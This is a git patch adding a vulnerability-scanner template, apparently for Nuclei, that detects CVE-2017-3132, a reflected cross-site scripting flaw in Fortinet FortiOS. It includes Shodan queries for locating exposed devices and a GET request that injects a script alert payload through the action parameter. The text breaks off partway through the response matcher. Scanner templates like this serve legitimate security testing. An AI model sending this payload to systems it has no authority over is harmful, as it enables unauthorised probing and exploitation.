From 9cdcf6af0063ba4377f34df200d96c7548cb023f Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 24 Sep 2024 12:16:37 +0400
Subject: [PATCH] Create CVE-2017-3132.yaml
---
http/cves/2017/CVE-2017-3132.yaml | 52 +++++++++++++++++++++++++++++++
1 file changed, 52 insertions(+)
create mode 100644 http/cves/2017/CVE-2017-3132.yaml
diff --git a/http/cves/2017/CVE-2017-3132.yaml b/http/cves/2017/CVE-2017-3132.yaml
new file mode 100644
index 0000000000..17cd0f7f4b
--- /dev/null
+++ b/http/cves/2017/CVE-2017-3132.yaml
@@ -0,0 +1,52 @@
+id: CVE-2017-3132
+
+info:
+ name: Fortinet FortiOS < 5.6.0 - Cross-Site Scripting
+ author: ritikchaddha
+ severity: medium
+ description: |
+ A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to Execute unauthorized code or commands via the action input during the activation of a FortiToken.
+ impact: |
+ Successful exploitation could lead to execution of malicious javascript.
+ remediation: |
+ Apply the latest security patches or upgrade to new version to mitigate the XSS vulnerability.
+ reference:
+ - https://www.exploit-db.com/exploits/42388
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-3132
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2017-3132
+ cwe-id: CWE-79
+ epss-score: 0.00046
+ epss-percentile: 0.15636
+ cpe: cpe:2.3:o:fortinet:fortios:5.4.0:*:*:*:*:*:*:*
+ metadata:
+ vendor: fortinet
+ product: fortios
+ shodan-query:
+ - http.html:"/remote/login" "xxxxxxxx"
+ - http.favicon.hash:945408572
+ - cpe:"cpe:2.3:o:fortinet:fortios"
+ tags: cve,cve2017,fortinet,fortios,xss
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "var action = '